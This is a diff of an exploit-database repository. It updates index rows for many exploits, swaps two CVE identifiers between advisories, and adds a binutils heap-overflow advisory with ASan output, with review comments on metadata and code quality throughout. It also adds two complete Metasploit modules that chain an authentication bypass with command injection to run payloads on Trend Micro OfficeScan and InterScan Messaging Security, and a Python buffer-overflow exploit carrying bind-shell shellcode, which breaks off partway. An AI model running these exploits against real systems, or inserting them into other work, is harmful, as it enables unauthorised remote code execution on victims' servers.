37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
@ -36403,8 +36406,8 @@ id,file,description,date,author,platform,type,port
37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0
37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
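
Review bot: the 37888 rename changes more than capitalisation: "Upload And Execute File Exploit" becomes "Upload and Execute Exploit", losing "File", while the 37887 row keeps it. If the intent was only to lowercase "And", keep "Upload and Execute File Exploit" so that searches on the earlier title still match.
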
@ -37231,7 +37234,7 @@ id,file,description,date,author,platform,type,port
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39573,platforms/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
@ -38306,7 +38309,7 @@ id,file,description,date,author,platform,type,port
42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
@ -38320,7 +38323,7 @@ id,file,description,date,author,platform,type,port
42101,platforms/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps,0
42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
@ -38401,7 +38404,7 @@ id,file,description,date,author,platform,type,port
42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
@ -38667,3 +38670,5 @@ id,file,description,date,author,platform,type,port
42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0
42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
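
Review bot: both added rows end with port 0, but each module's description says the management interface listens on TCP port 443 by default, and 42971.rb sets 'RPORT' => 443 in DefaultOptions. Other rows in this file record the service port (9999 for the up.time entries, 4343 for Aruba Mobility Controller), so 443 belongs here. The 42971 row also gives platform php and lives under platforms/php/ while the module declares 'Platform' => ['win']; if the column describes the target system rather than the language of the vulnerable component, that value needs another look.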


@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
CVE: CVE-2017-14757
Affected Software:
==================


@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
CVE: CVE-2017-14758
Affected Software:
==================
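
Review bot: the swapped CVE line cannot be verified from this diff. This file and the previous one show the identical title "OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - SQL Injection" in their context lines, and the two hunks simply exchange CVE-2017-14757 and CVE-2017-14758. State in the commit message which advisory each identifier maps to, and confirm that both files are really meant to carry the same title.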

112
platforms/linux/dos/42970.txt Executable file

@ -0,0 +1,112 @@
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Description:
binutils is a set of tools necessary to build programs.
The complete ASan output of the issue:
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
READ of size 1 at 0x613000000512 thread T0
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
allocated by thread T0 here:
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
Shadow bytes around the buggy address:
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3235==ABORTING
Affected version:
2.29.51.20170921 and maybe past releases
Fixed version:
N/A
Commit fix:
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-14939
Reproducer:
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
Timeline:
2017-09-21: bug discovered and reported to upstream
2017-09-24: upstream released a patch
2017-09-26: blog post about the issue
2017-09-29: CVE assigned
Note:
This bug was found with American Fuzzy Lop.
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
Permalink:
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
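
Review bot: the file header lists platforms/linux/dos/42970.txt as an "Executable file", but the content is a plain-text advisory (ASan trace, timeline, links) with nothing to run; add it with mode 100644 instead. The text also repeats itself: the blog URL appears under both "Source:" and "Permalink:", and the 42970.zip link appears under both "Reproducer:" and "Proof of Concept:"; one of each is enough.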

216
platforms/php/webapps/42971.rb Executable file

@ -0,0 +1,216 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro OfficeScan Remote Code Execution",
'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product
has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which
leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # author of command injection
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 443
},
'Platform' => ['win'],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }],
['OfficeScan 11', {}],
['OfficeScan XG', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 7 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
]
)
end
def build_csrftoken(my_target, phpsessid=nil)
vprint_status("Building csrftoken")
if my_target.name == 'OfficeScan XG'
csrf_token = Rex::Text.md5(Time.now.to_s)
else
csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
end
csrf_token
end
def auto_target
#XG version of the widget library has package.json within the same directory.
mytarget = target
if target['auto'] && target.name =~ /Automatic/
print_status('Automatic targeting enabled. Trying to detect version.')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
})
if res && res.code == 200
mytarget = targets[2]
elsif res && res.code == 404
mytarget = targets[1]
else
fail_with(Failure::Unknown, 'Unable to automatically select a target')
end
print_status("Selected target system : #{mytarget.name}")
end
mytarget
end
def auth(my_target)
# Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
# Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
if my_target.name == 'OfficeScan XG'
csrf_token = build_csrftoken(my_target)
cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
# Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us.
else
vprint_status("Sending session initiation request for : #{my_target.name}.")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
})
cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
csrf_token = build_csrftoken(my_target, res.get_cookies)
end
# Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
# Now we need to exploit authentication bypass vulnerability.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => cookie,
'vars_post' => {
'cid' => '1',
'act' => 'check',
'hash' => Rex::Text.rand_text_alpha(10),
'pid' => '1'
}
})
if res && res.code == 200 && res.body.include?('login successfully')
# Another business logic in here.
# Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
# Version XG want to use newly created PHPSESSID that comes from auth bypass response.
if my_target.name == 'OfficeScan XG'
res.get_cookies
else
cookie
end
else
nil
end
end
def check
my_target = auto_target
token = auth(my_target)
# If we dont have a cookie that means authentication bypass issue has been patched on target system.
if token.nil?
Exploit::CheckCode::Safe
else
# Authentication bypass does not mean that we have a command injection.
# Accessing to the widget framework without having command injection means literally nothing.
# So we gonna trigger command injection vulnerability without a payload.
csrf_token = build_csrftoken(my_target, token)
vprint_status('Trying to detect command injection vulnerability')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => ''
}
})
if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
def exploit
mytarget = auto_target
print_status('Exploiting authentication bypass')
cookie = auth(mytarget)
if cookie.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Authenticated successfully bypassed.")
end
print_status('Generating payload')
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
# We need to craft csrf value for version 11 again like we did before at auth function.
csrf_token = build_csrftoken(mytarget, cookie)
print_status('Trigerring command injection vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => "2>&1||#{p}"
}
})
end
end
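Review bot: in `check`, a nil return from `auth` is reported as `Exploit::CheckCode::Safe`, but the visible tail of `auth` returns nil whenever `res` is nil or the status is not 200, so a timeout or an unreachable console looks the same as a patched host. Anyone running `check` to confirm a fix would get a false all-clear; return `Exploit::CheckCode::Unknown` when no response arrives and keep `Safe` for a response that lacks 'login successfully'. The same applies to the second request in `check`, where a nil `res` also falls through to `Safe`. Smaller points: `exploit` discards the result of the final `send_request_cgi`, the local is named `my_target` in `check` but `mytarget` in `exploit`, the explicit `else nil` branch in `auth` is redundant, and the status strings "Authenticated successfully bypassed." and "Trigerring" need a spelling pass.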

130
platforms/php/webapps/42972.rb Executable file

@ -0,0 +1,130 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # author of command injection
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8445
},
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => '-bind'
},
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Oct 7 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
]
)
end
def extract_jsessionid
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
else
nil
end
end
def widget_auth(jsessionid)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
})
if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
res.get_cookies
else
nil
end
end
def check
# If we've managed to bypass authentication, that means target is most likely vulnerable.
jsessionid = extract_jsessionid
if jsessionid.nil?
return Exploit::CheckCode::Safe
end
auth = widget_auth(jsessionid)
if auth.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
print_status('Extracting JSESSIONID from publicly accessible log file')
jsessionid = extract_jsessionid
if jsessionid.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. JSESSIONID value = #{jsessionid}")
end
print_status('Initiating session with widget framework')
cookies = widget_auth(jsessionid)
if cookies.nil?
fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
else
print_good('Session with widget framework successfully initiated.')
end
print_status('Trigerring command injection vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => "$(python -c \"#{payload.encoded}\")"
}
})
end
end
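Review bot: the 'Description' says the management interface listens on TCP port 443 by default, while 'DefaultOptions' sets 'RPORT' => 8445; the two disagree, and the description should state the port the module actually uses. `extract_jsessionid` matches the literal 'JSEEEIONID' while every cookie in the file uses JSESSIONID, so add a comment saying whether that spelling is what diagnostic.log really contains, otherwise the next maintainer will "fix" it. The description also refers to "Proxy.php files under the mod TMCSS folder" while the request goes to proxy_controller.php with 'module' => 'modTMCSS'; align the wording. The cookie in `widget_auth` reads 'CurrentLocale=en-U=en_US' where `exploit` sends 'CurrentLocale=en-US', and `check` returns `Safe` when the log request gets no response at all, which conflates an unreachable host with one where the log is no longer exposed.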


@ -0,0 +1,85 @@
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
# Exploit Author: Parichay Rai
# Tested on: XP Service Pack 3
# CVE : CVE-2017-15221
Description
------------
A buffer overflow Attack possible due to improper input mechanism
Proof of Concept
----------------
#!/usr/bin/python
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
#This is an exploit that work well against a windows XP3 systems!
#Successful exploit gives you a bind shell on 4444
BadChar= "\x00\x0a\x0d\x20"
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
# Successful exploitation opens port 4444 on the victim Machine
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
